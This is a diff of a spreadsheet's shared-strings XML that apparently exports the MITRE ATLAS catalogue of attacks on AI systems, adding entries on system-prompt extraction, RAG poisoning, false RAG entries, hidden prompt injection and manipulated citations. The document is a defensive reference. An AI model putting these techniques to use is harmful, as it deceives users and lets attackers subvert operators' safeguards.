-  </si>
-  <si>
-    <t>attack-pattern--d2cf31e0-a550-4fe0-8fdb-8941b3ac00d9</t>
-  </si>
-  <si>
-    <t>attack-pattern--b5626410-b33d-4487-9c0f-2b7d844b8e95</t>
-  </si>
-  <si>
-    <t>attack-pattern--7d76070d-2124-4ee6-913d-6015a697eaf6</t>
-  </si>
-  <si>
-    <t>attack-pattern--fa01f518-7217-4432-83c6-772d9390647c</t>
-  </si>
-  <si>
-    <t>attack-pattern--452b8fdf-8679-4013-bb38-4d16f65430bc</t>
-  </si>
-  <si>
-    <t>attack-pattern--c086784e-1494-4f75-a4a0-d3ad054b9428</t>
-  </si>
-  <si>
-    <t>attack-pattern--db2b3112-a99b-45a0-be10-c69157b616f0</t>
-  </si>
-  <si>
-    <t>attack-pattern--1f1f14ef-7d04-42b2-9f05-b740113b30f5</t>
-  </si>
-  <si>
-    <t>attack-pattern--c2ca6b46-bcdf-45a8-b33d-3272c7a65cde</t>
-  </si>
-  <si>
-    <t>attack-pattern--4d5c6974-0307-4535-bf37-7bb4c6a2ef47</t>
-  </si>
-  <si>
-    <t>attack-pattern--e0eb2b64-aebd-4412-80f3-b71d7805a65f</t>
-  </si>
-  <si>
-    <t>attack-pattern--0ec538ca-589b-4e42-bcaa-06097a0d679f</t>
-  </si>
-  <si>
-    <t>attack-pattern--f09d9beb-4cb5-4094-83b6-e46bedc8a20e</t>
-  </si>
-  <si>
-    <t>attack-pattern--53c52153-8a3f-4952-8e20-e9ab7ca899a7</t>
-  </si>
-  <si>
-    <t>attack-pattern--f4fc2abd-71a4-401a-a742-18fc5aeb4bc3</t>
-  </si>
-  <si>
-    <t>attack-pattern--e3b9d41a-d2f9-4825-942f-1c4a30b4d2f9</t>
-  </si>
-  <si>
-    <t>attack-pattern--69e73593-f838-4855-9096-c316eabfb4d6</t>
-  </si>
-  <si>
-    <t>attack-pattern--8c26f51a-c403-4c4d-852a-a1c56fe9e7cd</t>
-  </si>
-  <si>
-    <t>attack-pattern--b23cda85-3457-406d-b043-24d2cf9e6fcf</t>
-  </si>
-  <si>
-    <t>attack-pattern--8f510e67-2f0c-4642-9811-25c67643363c</t>
-  </si>
-  <si>
-    <t>attack-pattern--65d21e6b-7abe-4623-8f5c-88011cb362cb</t>
-  </si>
-  <si>
-    <t>attack-pattern--5921c4ad-0a32-47fb-8ab2-67d18dbac8ba</t>
-  </si>
-  <si>
-    <t>attack-pattern--d18afb87-0de2-43dc-ab6a-eb914a7dbae7</t>
-  </si>
-  <si>
-    <t>attack-pattern--6c1fca80-3ba9-41c9-8f7b-9824310a94f1</t>
-  </si>
-  <si>
-    <t>attack-pattern--7159b4d1-7681-4028-8110-8ebdb16c7700</t>
-  </si>
-  <si>
-    <t>attack-pattern--b37a58fd-ee29-4f1d-92d8-3bfccf884e8b</t>
-  </si>
-  <si>
-    <t>attack-pattern--75e15967-69df-4bdf-b662-979fb1e56c3e</t>
-  </si>
-  <si>
-    <t>attack-pattern--a3660a2d-f6e5-4f1b-9618-332cceb389c8</t>
-  </si>
-  <si>
-    <t>attack-pattern--be6ef5c5-1ecb-486d-9743-42085bd2c256</t>
-  </si>
-  <si>
-    <t>attack-pattern--04d61746-9df1-468e-99d3-0a4685856deb</t>
-  </si>
-  <si>
-    <t>attack-pattern--ad290fa3-d87b-43d2-a547-bfa22387c132</t>
-  </si>
-  <si>
-    <t>attack-pattern--8c849dd4-5d15-45aa-b5b2-59c96a3ab939</t>
-  </si>
-  <si>
-    <t>attack-pattern--6ca1ad37-f08f-4f15-b85d-a48905cc245c</t>
-  </si>
-  <si>
-    <t>attack-pattern--1b047901-cd87-4d1d-aa88-d7335855b65f</t>
-  </si>
-  <si>
-    <t>attack-pattern--b587a898-010b-4b2f-98a4-379d7c36c9e0</t>
-  </si>
-  <si>
-    <t>attack-pattern--ab01ba21-1438-4cd9-a588-92eb271086bc</t>
+    <t>attack-pattern--da8fff4a-bfff-4fe2-9d45-1c01fd9d3b73</t>
+  </si>
+  <si>
+    <t>attack-pattern--3821f3bc-85b6-4090-9061-96f19a1a5582</t>
+  </si>
+  <si>
+    <t>attack-pattern--c652f980-4fff-47ae-8119-d6a927255ebc</t>
+  </si>
+  <si>
+    <t>attack-pattern--40688955-5558-47a9-ad37-393d75b4107f</t>
+  </si>
+  <si>
+    <t>attack-pattern--341c0beb-7a50-4669-8abc-fb6e22e96807</t>
+  </si>
+  <si>
+    <t>attack-pattern--01ac9ace-7f47-4082-ad0a-62e1696478e8</t>
+  </si>
+  <si>
+    <t>attack-pattern--2ea7686d-a65f-4e06-b962-02495a8f1cdb</t>
+  </si>
+  <si>
+    <t>attack-pattern--fb1d969f-a88b-4404-a1a5-36fc7eab7c41</t>
+  </si>
+  <si>
+    <t>attack-pattern--8f1fef8f-0971-4171-a7a3-2a2e9b7c087c</t>
+  </si>
+  <si>
+    <t>attack-pattern--ce2d3599-8f7a-495e-aa86-05311ba51356</t>
+  </si>
+  <si>
+    <t>attack-pattern--15cf5a0f-8aab-45b1-aea7-f163d6be9d92</t>
+  </si>
+  <si>
+    <t>attack-pattern--9a779962-38cd-4b1e-94f7-ff704d090dd6</t>
+  </si>
+  <si>
+    <t>attack-pattern--71236163-a6a2-48d2-aee5-df2c480df0d7</t>
+  </si>
+  <si>
+    <t>attack-pattern--d3cfc2f0-87dc-4fb1-8a0d-9b5cf7d10484</t>
+  </si>
+  <si>
+    <t>attack-pattern--ee609ad3-6280-4514-85af-b00798a78e84</t>
+  </si>
+  <si>
+    <t>attack-pattern--4c34c31f-5157-48ad-acb8-4344cadd93cf</t>
+  </si>
+  <si>
+    <t>attack-pattern--42caf4ac-db7b-4dd4-9299-06d39dd3d8d2</t>
+  </si>
+  <si>
+    <t>attack-pattern--25865eb8-7709-4e3b-9d43-878646f8f5a5</t>
+  </si>
+  <si>
+    <t>attack-pattern--f85d3313-5de8-4d27-9d23-bf3fa79946e5</t>
+  </si>
+  <si>
+    <t>attack-pattern--861e7c2c-3f39-4131-b657-d9d9149189d0</t>
+  </si>
+  <si>
+    <t>attack-pattern--ca864493-d868-4671-ba43-b721b10a5bba</t>
+  </si>
+  <si>
+    <t>attack-pattern--dcce6e07-56ea-416a-a15b-7693f0f0d631</t>
+  </si>
+  <si>
+    <t>attack-pattern--737e473c-ed93-4f70-95a0-9c1ae74390bb</t>
+  </si>
+  <si>
+    <t>attack-pattern--8d2b6be6-f86e-4b55-97de-491979e9cf2a</t>
+  </si>
+  <si>
+    <t>attack-pattern--63388116-e4dd-45c5-8021-74bfd69e66a0</t>
+  </si>
+  <si>
+    <t>attack-pattern--8a47d00f-77c8-4144-8452-facca3096fa3</t>
+  </si>
+  <si>
+    <t>attack-pattern--9115a9b6-855a-4acf-802c-aad9eeedc310</t>
+  </si>
+  <si>
+    <t>attack-pattern--b99c824b-c87f-4e39-ba72-7b8b299f0039</t>
+  </si>
+  <si>
+    <t>attack-pattern--ce19e9c5-1006-43af-a6de-cd16021be9f5</t>
+  </si>
+  <si>
+    <t>attack-pattern--07179795-e764-4d6a-a105-7fc73bd970ff</t>
+  </si>
+  <si>
+    <t>attack-pattern--4b0d8468-e00f-4ba2-9e18-1a2f527f08b2</t>
+  </si>
+  <si>
+    <t>attack-pattern--becf223c-e8c2-41f7-85b6-d29859ca95d7</t>
+  </si>
+  <si>
+    <t>attack-pattern--ccf27b22-48bf-4219-a668-fa60eb0d94a4</t>
+  </si>
+  <si>
+    <t>attack-pattern--55a17dc0-be82-40b8-80e7-f97e1e867b58</t>
+  </si>
+  <si>
+    <t>attack-pattern--3f333baa-31b3-4196-966c-5298a8b106c5</t>
+  </si>
+  <si>
+    <t>attack-pattern--33fd1b84-34af-473e-a0cf-99bb1dec61c6</t>
+  </si>
+  <si>
+    <t>attack-pattern--60eeb103-32b3-429f-895e-99c229e1181e</t>
+  </si>
+  <si>
+    <t>attack-pattern--b68a2222-7aba-4a03-9f64-20e89faf4ec6</t>
+  </si>
+  <si>
+    <t>attack-pattern--9ab0c79a-4dcf-4270-a272-af080402402d</t>
+  </si>
+  <si>
+    <t>attack-pattern--96d40a8c-f6ff-4f15-97b0-aa2b678fd743</t>
+  </si>
+  <si>
+    <t>attack-pattern--968c7b7f-6bb4-4d0e-bbab-3098ce12b4ce</t>
+  </si>
+  <si>
+    <t>attack-pattern--07ebffc5-e98e-4330-bf94-7f0c56b16345</t>
+  </si>
+  <si>
+    <t>attack-pattern--5eb94c9f-0db2-4f09-9458-60467f9daeb2</t>
+  </si>
+  <si>
+    <t>attack-pattern--55906ca3-dcfa-46d0-ade8-da3c6554984d</t>
+  </si>
+  <si>
+    <t>attack-pattern--39d1fb41-32e9-4909-bc4d-acb4751b118b</t>
+  </si>
+  <si>
+    <t>attack-pattern--3897f551-0533-4714-b8de-47e3879e42ae</t>
+  </si>
+  <si>
+    <t>attack-pattern--02c2f3c6-678a-40f7-997b-a3faa54a5760</t>
+  </si>
+  <si>
+    <t>attack-pattern--294fe4dc-ac27-4b40-ae40-8148b9876f25</t>
+  </si>
+  <si>
+    <t>attack-pattern--09d078c4-833c-4d5c-a69c-5066d8c6917b</t>
+  </si>
+  <si>
+    <t>attack-pattern--93c93189-92f6-4485-8ddf-6c5e501f416f</t>
+  </si>
+  <si>
+    <t>attack-pattern--78f299a3-0032-47c4-8841-aa9f8c226398</t>
+  </si>
+  <si>
+    <t>attack-pattern--ab05c807-8854-40d8-a20e-28edae445c80</t>
+  </si>
+  <si>
+    <t>attack-pattern--8bc3f855-f8ba-46c1-85a7-a036679ed8b6</t>
+  </si>
+  <si>
+    <t>attack-pattern--151bebab-0e27-442b-838e-bb0d9a36c32f</t>
+  </si>
+  <si>
+    <t>attack-pattern--8dee1775-3523-439c-948d-99a5387645f9</t>
+  </si>
+  <si>
+    <t>attack-pattern--f9eddd08-a29a-4598-80a4-171d456be7c7</t>
+  </si>
+  <si>
+    <t>attack-pattern--135cc710-eaed-4a45-828b-651a3cc78a72</t>
+  </si>
+  <si>
+    <t>attack-pattern--e50d39d3-4be4-465a-8b98-e35c1637a898</t>
+  </si>
+  <si>
+    <t>attack-pattern--b91523ae-ada9-4ad1-a112-0113f29462fd</t>
+  </si>
+  <si>
+    <t>attack-pattern--6a67aef8-329e-4669-84bd-c1aa0a67ac68</t>
+  </si>
+  <si>
+    <t>attack-pattern--73458135-2102-4753-ad0a-f74ae73c4038</t>
+  </si>
+  <si>
+    <t>attack-pattern--7360aac5-ab15-4d95-ab5e-bef1af305788</t>
+  </si>
+  <si>
+    <t>attack-pattern--f9590f8d-cb5f-47ba-a25d-76a237dd8904</t>
+  </si>
+  <si>
+    <t>attack-pattern--a4783291-4917-4ea8-8f34-b9b6180ae332</t>
+  </si>
+  <si>
+    <t>attack-pattern--e4653a0a-5832-4c26-ab98-e31a31936085</t>
+  </si>
+  <si>
+    <t>attack-pattern--f2d925fe-4436-4d33-83b1-2d4ee500c2cc</t>
+  </si>
+  <si>
+    <t>attack-pattern--a3263fd3-29c5-4881-84f8-fc72d3c91c71</t>
+  </si>
+  <si>
+    <t>attack-pattern--d3301bd5-0f28-4604-a167-15aa4f17160d</t>
+  </si>
+  <si>
+    <t>attack-pattern--784cbb90-b5f0-47d1-af8c-d299c5b3c551</t>
+  </si>
+  <si>
+    <t>attack-pattern--17b04e23-b6a0-4e72-9094-dc9677d07436</t>
+  </si>
+  <si>
+    <t>attack-pattern--1c639b2f-42ad-4613-958d-507b7270ee6a</t>
+  </si>
+  <si>
+    <t>attack-pattern--b7cb2827-30e5-4d66-b092-f26fbbbdfa18</t>
+  </si>
+  <si>
+    <t>attack-pattern--2693de2c-725f-4d66-abb2-a940efcff1b5</t>
+  </si>
+  <si>
+    <t>attack-pattern--c44decce-8b70-4f42-a5e0-db0bb105d0b4</t>
+  </si>
+  <si>
+    <t>attack-pattern--d63c873b-7e01-437d-98ef-d681099c3377</t>
+  </si>
+  <si>
+    <t>attack-pattern--a0b808b3-648d-4fd3-91d1-6b3baab37832</t>
+  </si>
+  <si>
+    <t>attack-pattern--4f65193d-97ad-4231-8934-f5f7c7e7237f</t>
+  </si>
+  <si>
+    <t>attack-pattern--89461ddf-4d27-40e7-ba53-8221012fe9c1</t>
+  </si>
+  <si>
+    <t>attack-pattern--97fe9577-c7ed-466d-817d-697f815db7b0</t>
+  </si>
+  <si>
+    <t>attack-pattern--3898e02f-8eda-4360-aba5-9ee37943538c</t>
+  </si>
+  <si>
+    <t>attack-pattern--b32fbde1-97bc-41a1-bcea-04d32aa7e44e</t>
+  </si>
+  <si>
+    <t>attack-pattern--1c02a88b-8f6c-45f3-bcc8-8045a74d9103</t>
+  </si>
+  <si>
+    <t>attack-pattern--6f3e625e-3157-4b30-bb7f-f8f25b21c8dc</t>
+  </si>
+  <si>
+    <t>attack-pattern--d886ab0c-9c92-40f6-aad8-930476504be8</t>
+  </si>
+  <si>
+    <t>attack-pattern--9c9e3e54-a786-4511-a4c5-62f3e216febe</t>
+  </si>
+  <si>
+    <t>attack-pattern--0e9e22e3-9b1e-4a9d-8ff6-da7ba7b9018f</t>
+  </si>
+  <si>
+    <t>attack-pattern--3d0887a8-d7fa-4820-96b9-ab087f6cd70b</t>
+  </si>
+  <si>
+    <t>attack-pattern--f0b63383-fff7-499c-9dce-56e0d9f87742</t>
+  </si>
+  <si>
+    <t>attack-pattern--5d68a5e9-942d-4213-9c6c-ac27d9fb786c</t>
+  </si>
+  <si>
+    <t>attack-pattern--c0fc514b-0748-4a53-8a45-4fde867c8ef1</t>
+  </si>
+  <si>
+    <t>attack-pattern--e871484e-8be8-4b75-9ec4-a6a494282bcd</t>
+  </si>
+  <si>
+    <t>attack-pattern--0599abae-6ad1-439f-8c53-63d24e0c940a</t>
+  </si>
+  <si>
+    <t>attack-pattern--338ed75b-40fc-40b9-9880-e4c9c9f98674</t>
+  </si>
+  <si>
+    <t>attack-pattern--620feb23-65d5-4b26-a0c4-d38cbd397258</t>
+  </si>
+  <si>
+    <t>attack-pattern--8e6e76e6-3e86-4317-ac4c-197a104d937a</t>
+  </si>
+  <si>
+    <t>attack-pattern--f9408f13-6211-4259-85e1-794dc96a6100</t>
+  </si>
+  <si>
+    <t>attack-pattern--df46bcf0-0231-413c-9661-7f7d0e39b63e</t>
+  </si>
+  <si>
+    <t>attack-pattern--3162b9bd-2bed-4d55-a1f5-7fb9ddccf609</t>
+  </si>
+  <si>
+    <t>attack-pattern--5f25a27a-5459-434a-81c7-633a2cb98521</t>
+  </si>
+  <si>
+    <t>attack-pattern--fe45ad62-1ed6-45fb-a6ba-19140fed8cda</t>
+  </si>
+  <si>
+    <t>attack-pattern--541403a4-65af-4190-bea8-5d8a01454d13</t>
+  </si>
+  <si>
+    <t>attack-pattern--cf5dcf13-9ca9-475f-8544-eceae7503cdf</t>
+  </si>
+  <si>
+    <t>attack-pattern--8918438b-7422-4f85-b8c8-32d98b5439c6</t>
+  </si>
+  <si>
+    <t>attack-pattern--4a040cc9-d53d-4fa3-948d-a1ff8f02e0eb</t>
   </si>
   <si>
     <t>AI Model Inference API Access</t>
@@ -619,6 +697,9 @@
     <t>Black-Box Transfer</t>
   </si>
   <si>
+    <t>Citations</t>
+  </si>
+  <si>
     <t>Command and Scripting Interpreter</t>
   </si>
   <si>
@@ -661,6 +742,9 @@
     <t>Discover LLM Hallucinations</t>
   </si>
   <si>
+    <t>Discover LLM System Information</t>
+  </si>
+  <si>
     <t>Discover ML Artifacts</t>
   </si>
   <si>
@@ -697,15 +781,27 @@
     <t>External Harms</t>
   </si>
   <si>
+    <t>Extract LLM System Prompt</t>
+  </si>
+  <si>
     <t>Extract ML Model</t>
   </si>
   <si>
+    <t>False RAG Entry Injection</t>
+  </si>
+  <si>
     <t>Financial Harm</t>
   </si>
   <si>
     <t>Full ML Model Access</t>
   </si>
   <si>
+    <t>Gather RAG-Indexed Targets</t>
+  </si>
+  <si>
+    <t>Generative AI</t>
+  </si>
+  <si>
     <t>Hardware</t>
   </si>
   <si>
@@ -733,18 +829,24 @@
     <t>LLM Jailbreak</t>
   </si>
   <si>
-    <t>LLM Meta Prompt Extraction</t>
-  </si>
-  <si>
     <t>LLM Plugin Compromise</t>
   </si>
   <si>
+    <t>LLM Prompt Crafting</t>
+  </si>
+  <si>
     <t>LLM Prompt Injection</t>
   </si>
   <si>
+    <t>LLM Prompt Obfuscation</t>
+  </si>
+  <si>
     <t>LLM Prompt Self-Replication</t>
   </si>
   <si>
+    <t>LLM Trusted Output Components Manipulation</t>
+  </si>
+  <si>
     <t>ML Artifact Collection</t>
   </si>
   <si>
@@ -805,9 +907,15 @@
     <t>Publish Poisoned Models</t>
   </si>
   <si>
+    <t>RAG Poisoning</t>
+  </si>
+  <si>
     <t>Reputational Harm</t>
   </si>
   <si>
+    <t>Retrieval Content Crafting</t>
+  </si>
+  <si>
     <t>Search Application Repositories</t>
   </si>
   <si>
@@ -830,6 +938,15 @@
   </si>
   <si>
     <t>Spearphishing via Social Engineering LLM</t>
+  </si>
+  <si>
+    <t>Special Character Sets</t>
+  </si>
+  <si>
+    <t>System Instruction Keywords</t>
+  </si>
+  <si>
+    <t>System Prompt</t>
   </si>
   <si>
     <t>Technical Blogs</t>
@@ -927,6 +1044,9 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may manipulate the citations provided in an AI system's response, in order to make it appear trustworthy. Variants include citing a providing the wrong citation, making up a new citation, or providing the right citation but for adversary-provided data.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.
 There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic.
 Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.
@@ -1013,6 +1133,9 @@
 They may request software packages, commands, URLs, organization names, or e-mail addresses, and identify hallucinations with no connected real-world source. Discovered hallucinations provide the adversary with potential targets to [Publish Hallucinated Entities](/techniques/AML.T0060). Different LLMs have been shown to produce the same hallucinations, so the hallucinations exploited by an adversary may affect users of other LLMs.</t>
   </si>
   <si>
+    <t>The adversary is trying to discover something about the large language model's (LLM) system information. This may be found in a configuration file containing the system instructions or extracted via interactions with the LLM. The desired information may include the full system prompt, special characters that have significance to the LLM or keywords indicating functionality available to the LLM. Information about how the LLM is instructed can be used by the adversary to understand the system's capabilities and to aid them in crafting malicious prompts.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Adversaries may search private sources to identify machine learning artifacts that exist on the system and gather information about them.
 These artifacts can include the software stack used to train and deploy models, training and testing data management systems, container registries, software repositories, and model zoos.
 This information can be used to identify targets for further collection, exfiltration, or disruption, and to tailor and improve attacks.
@@ -1077,6 +1200,10 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may attempt to extract a large language model's (LLM) system prompt. This can be done via prompt injection to induce the model to reveal its own system prompt or may be extracted from a configuration file.
+System prompts can be a portion of an AI provider's competitive advantage and are thus valuable intellectual property that may be targeted by adversaries.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Adversaries may extract a functional copy of a private model.
 By repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.
 The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.
@@ -1085,6 +1212,11 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may introduce false entries into a victim's retrieval augmented generation (RAG) database. Content designed to be interpreted as a document by the large language model (LLM) used in the RAG system is included in a data source being ingested into the RAG database. When RAG entry including the false document is retrieved the, the LLM is tricked into treating part of the retrieved content as a false RAG result. 
+By including a false RAG document inside of a regular RAG entry, it bypasses data monitoring tools. It also prevents the document from being deleted directly. 
+The adversary may use discovered system keywords to learn how to instruct a particular LLM to treat content as a RAG entry. They may be able to manipulate the injected entry's metadata including document title, author, and creation date.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Financial harm involves the loss of wealth, property, or other monetary assets due to theft, fraud or forgery, or pressure to provide financial resources to the adversary.
 </t>
   </si>
@@ -1093,6 +1225,14 @@
 This means the adversary has complete knowledge of the model architecture, its parameters, and class ontology.
 They may exfiltrate the model to [Craft Adversarial Data](/techniques/AML.T0043) and [Verify Attack](/techniques/AML.T0042) in an offline where it is hard to detect their behavior.
 </t>
+  </si>
+  <si>
+    <t>Adversaries may identify data sources used in retrieval augmented generation (RAG) systems for targeting purposes. By pinpointing these sources, attackers can focus on poisoning or otherwise manipulating the external data repositories the AI relies on.
+RAG-indexed data may be identified in public documentation about the system, or by interacting with the system directly and observing any indications of or references to external data sources.</t>
+  </si>
+  <si>
+    <t>Adversaries may search for and obtain generative AI models or tools, such as large language models (LLMs), to assist them in various steps of their operation. Generative AI can be used in a variety of malicious ways, including generating malware or offensive cyber scripts, [Retrieval Content Crafting](/techniques/AML.T0066), or generating [Phishing](/techniques/AML.T0052) content.
+Adversaries may obtain an open source model or they may leverage a generative AI service. They may need to jailbreak the generative AI model to bypass any restrictions put in place to limit the types of responses it can generate. They may also need to break the terms of service of the generative AI.</t>
   </si>
   <si>
     <t>Adversaries may target AI systems by disrupting or manipulating the hardware supply chain. AI models often run on specialized hardware such as GPUs, TPUs, or embedded devices, but may also be optimized to operate on CPUs.</t>
@@ -1141,12 +1281,6 @@
   <si>
     <t xml:space="preserve">An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to place LLM in a state in which it will freely respond to any user input, bypassing any controls, restrictions, or guardrails placed on the LLM.
 Once successfully jailbroken, the LLM can be used in unintended ways by the adversary.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">An adversary may induce an LLM to reveal its initial instructions, or "meta prompt."
-Discovering the meta prompt can inform the adversary about the internal workings of the system.
-Prompt engineering is an emerging field that requires expertise and exfiltrating the meta prompt can prompt in order to steal valuable intellectual property.
 </t>
   </si>
   <si>
@@ -1157,6 +1291,10 @@
 Adversaries may take advantage of connected data sources to retrieve sensitive information.
 They may also use an LLM integrated with a command or script interpreter to execute arbitrary instructions.
 </t>
+  </si>
+  <si>
+    <t>Adversaries may use their acquired knowledge of the target generative AI system to craft prompts that bypass its defenses and allow malicious instructions to be executed.
+The adversary may iterate on the prompt to ensure that it works as-intended consistently.</t>
   </si>
   <si>
     <t xml:space="preserve">An adversary may craft malicious prompts as inputs to an LLM that cause the LLM to act in unintended ways.
@@ -1169,7 +1307,15 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may hide or otherwise obfuscate prompt injections or retrieval content from the user to avoid detection.
+This may include modifying how the injection is rendered such as small text, text colored the same as the background, or hidden HTML elements.</t>
+  </si>
+  <si>
     <t>An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to cause the LLM to replicate the prompt as part of its output. This allows the prompt to propagate to other LLMs and persist on the system. The self-replicating prompt is typically paired with other malicious instructions (ex: [LLM Jailbreak](/techniques/AML.T0054), [LLM Data Leakage](/techniques/AML.T0057)).</t>
+  </si>
+  <si>
+    <t>Adversaries may utilize prompts to a large language model (LLM) which manipulate various components of its response in order to make it appear trustworthy to the user. This helps the adversary continue to operate in the victim's environment and evade detection by the users it interacts with.
+The LLM may be instructed to tailor its language to appear more trustworthy to the user or attempt to manipulate the user to take certain actions. Other response components that could be manipulated include links, recommended follow-up actions, retrieved document metadata, and [Citations](/techniques/AML.T0067.000).</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may collect ML artifacts for [Exfiltration](/tactics/AML.TA0010) or for use in [ML Attack Staging](/tactics/AML.TA0001).
@@ -1286,8 +1432,17 @@
     <t>Adversaries may publish a poisoned model to a public location such as a model registry or code repository. The poisoned model may be a novel model or a poisoned variant of an existing open-source model. This model may be introduced to a victim system via [ML Supply Chain Compromise](/techniques/AML.T0010).</t>
   </si>
   <si>
+    <t>Adversaries may inject malicious content into data indexed by a retrieval augmented generation (RAG) system to contaminate a future thread through RAG-based search results. This may be accomplished by placing manipulated documents in a location the RAG indexes (see [Gather RAG-Indexed Targets](/techniques/AML.T0064)).
+The content may be targeted such that it would always surface as a search result for a specific user query. The adversary's content may include false or misleading information. It may also include prompt injections with malicious instructions, or false RAG entries.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Reputational harm involves a degradation of public perception and trust in organizations.  Examples of reputation-harming incidents include scandals or false impersonations.
 </t>
+  </si>
+  <si>
+    <t>Adversaries may write content designed to be retrieved by user queries and influence a user of the system in some way. This abuses the trust the user has in the system.
+The crafted content can be combined with a prompt injection. It can also stand alone in a separate document or email. The adversary must get the crafted content into the victim\u0027s database, such as a vector database used in a retrieval augmented generation (RAG) system. This may be accomplished via cyber access, or by abusing the ingestion mechanisms common in RAG systems (see [RAG Poisoning](/techniques/AML.T0070)).
+Large language models may be used as an assistant to aid an adversary in crafting content.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may search open application repositories during targeting.
@@ -1344,6 +1499,15 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may discover delimiters and special characters sets used by the large language model. For example, delimiters used in retrieval augmented generation applications to differentiate between context and user prompts. These can later be exploited to confuse or manipulate the large language model into misbehaving.</t>
+  </si>
+  <si>
+    <t>Adversaries may discover keywords that have special meaning to the large language model (LLM), such as function names or object names. These can later be exploited to confuse or manipulate the LLM into misbehaving and to make calls to plugins the LLM has access to.</t>
+  </si>
+  <si>
+    <t>Adversaries may discover a large language model's system instructions provided by the AI system builder to learn about the system's capabilities and circumvent its guardrails.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Research labs at academic institutions and Company R&amp;D divisions often have blogs that highlight their use of machine learning and its application to the organizations unique problems.
 Individual researchers also frequently document their work in blogposts.
 An adversary may search for posts made by the target victim organization or its employees.
@@ -1440,6 +1604,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0043.002</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0067.000</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0050</t>
   </si>
   <si>
@@ -1482,6 +1649,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0062</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0069</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0007</t>
   </si>
   <si>
@@ -1518,15 +1688,27 @@
     <t>https://atlas.mitre.org/techniques/AML.T0048</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0056</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0024.002</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0071</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0048.000</t>
   </si>
   <si>
     <t>https://atlas.mitre.org/techniques/AML.T0044</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0064</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0016.002</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0010.000</t>
   </si>
   <si>
@@ -1554,18 +1736,24 @@
     <t>https://atlas.mitre.org/techniques/AML.T0054</t>
   </si>
   <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0056</t>
-  </si>
-  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0053</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0065</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0051</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0068</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0061</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0067</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0035</t>
   </si>
   <si>
@@ -1626,9 +1814,15 @@
     <t>https://atlas.mitre.org/techniques/AML.T0058</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0070</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0048.001</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0066</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0004</t>
   </si>
   <si>
@@ -1653,6 +1847,15 @@
     <t>https://atlas.mitre.org/techniques/AML.T0052.000</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0069.000</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0069.001</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0069.002</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0000.002</t>
   </si>
   <si>
@@ -1686,37 +1889,7 @@
     <t>https://atlas.mitre.org/techniques/AML.T0043.000</t>
   </si>
   <si>
-    <t>13 May 2021</t>
-  </si>
-  <si>
-    <t>25 October 2023</t>
-  </si>
-  <si>
-    <t>28 February 2023</t>
-  </si>
-  <si>
-    <t>24 January 2022</t>
-  </si>
-  <si>
-    <t>01 October 2024</t>
-  </si>
-  <si>
-    <t>27 October 2022</t>
-  </si>
-  <si>
-    <t>18 January 2023</t>
-  </si>
-  <si>
-    <t>12 January 2024</t>
-  </si>
-  <si>
-    <t>12 October 2023</t>
-  </si>
-  <si>
-    <t>11 March 2024</t>
-  </si>
-  <si>
-    <t>29 April 2024</t>
+    <t>14 March 2025</t>
   </si>
